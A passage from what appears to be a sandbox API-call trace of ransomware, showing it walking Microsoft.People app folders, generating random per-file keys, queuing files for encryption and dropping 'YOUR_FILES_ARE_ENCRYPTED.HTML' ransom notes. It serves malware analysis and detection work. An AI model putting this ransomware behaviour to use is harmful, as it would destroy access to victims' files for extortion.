dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626778 [0117.296] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.296] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0117.296] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.296] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore") returned 143 [0117.296] GetProcessHeap () returned 0x600000 [0117.296] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0117.296] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore" [0117.296] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\*" [0117.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e36194c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0117.388] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e36194c, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0117.388] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e636973, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e636973, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0117.388] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.388] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 163 [0117.388] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0117.388] lstrlenW (lpString=".dat") returned 4 [0117.388] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0117.388] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0117.388] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\microsoft.people_10.0.2840.0_x64__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0117.389] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=32768) returned 1 [0117.389] GetProcessHeap () returned 0x600000 [0117.389] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0117.391] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="7B") returned 2 [0117.391] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="99") returned 2 [0117.391] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="42") returned 2 [0117.391] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="20") returned 2 [0117.391] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="12") returned 2 [0117.391] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="CA") returned 2 [0117.391] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="8D") returned 2 [0117.391] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="1A") returned 2 [0117.391] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="6F") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="04") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="73") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="0C") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="28") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="31") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="89") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="59") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="92") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="07") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="0B") returned 2 [0117.392] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="39") returned 2 [0117.392] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="4D") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="A6") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="59") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="F4") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="05") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="E8") returned 2 [0117.392] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="B0") returned 2 [0117.392] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="0B") returned 2 [0117.392] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="4D") returned 2 [0117.392] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="5B") returned 2 [0117.392] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="C1") returned 2 [0117.392] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="79") returned 2 [0117.393] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0117.393] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0117.393] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0117.393] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e315496, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e315496, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e315496, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0117.393] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.393] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 168 [0117.393] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0117.393] lstrlenW (lpString=".LOG1") returned 5 [0117.393] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0117.393] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e315496, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e315496, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e315496, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0117.393] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.393] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 168 [0117.393] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0117.393] lstrlenW (lpString=".LOG2") returned 5 [0117.393] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0117.393] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x5e315496, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e315496, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e315496, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0117.393] FindClose (in: hFindFile=0x6267b8 | out: hFindFile=0x6267b8) returned 1 [0117.393] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 173 [0117.393] GetProcessHeap () returned 0x600000 [0117.393] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\microsoft.people_10.0.2840.0_x64__8wekyb3d8bbwe\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0117.395] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0117.396] CloseHandle (hObject=0x214) returned 1 [0117.396] GetProcessHeap () returned 0x600000 [0117.396] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.396] GetProcessHeap () returned 0x600000 [0117.396] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0117.396] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5e2c90b6, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5e2c90b6, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5e2c90b6, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0117.396] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0117.396] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 157 [0117.396] GetProcessHeap () returned 0x600000 [0117.396] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Microsoft.People_10.0.2840.0_x64__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\microsoft.people_10.0.2840.0_x64__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.397] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.397] CloseHandle (hObject=0x320) returned 1 [0117.398] GetProcessHeap () returned 0x600000 [0117.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.398] GetProcessHeap () returned 0x600000 [0117.398] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.398] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0117.398] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.399] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState") returned 92 [0117.399] GetProcessHeap () returned 0x600000 [0117.399] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.399] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState" [0117.400] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState\\*" [0117.400] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0117.400] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.400] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dae33de, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dae33de, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dae33de, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0117.400] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0117.400] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0117.400] GetProcessHeap () returned 0x600000 [0117.400] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0117.400] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.people_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0117.401] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0117.402] CloseHandle (hObject=0x320) returned 1 [0117.402] GetProcessHeap () returned 0x600000 [0117.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0117.402] GetProcessHeap () returned 0x600000 [0117.402] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0117.402] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0117.402] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0117.402] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings") returned 88 [0117.402] GetProcessHeap () returned 0x600000 [0117.402] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0117.402] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings" [0117.402] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\*" [0117.402] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.People_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0117.402] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dbc8273, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dbc8273, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x631228, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0117.402] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc86f85, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x5dc86f85, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x5dc86f85, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, 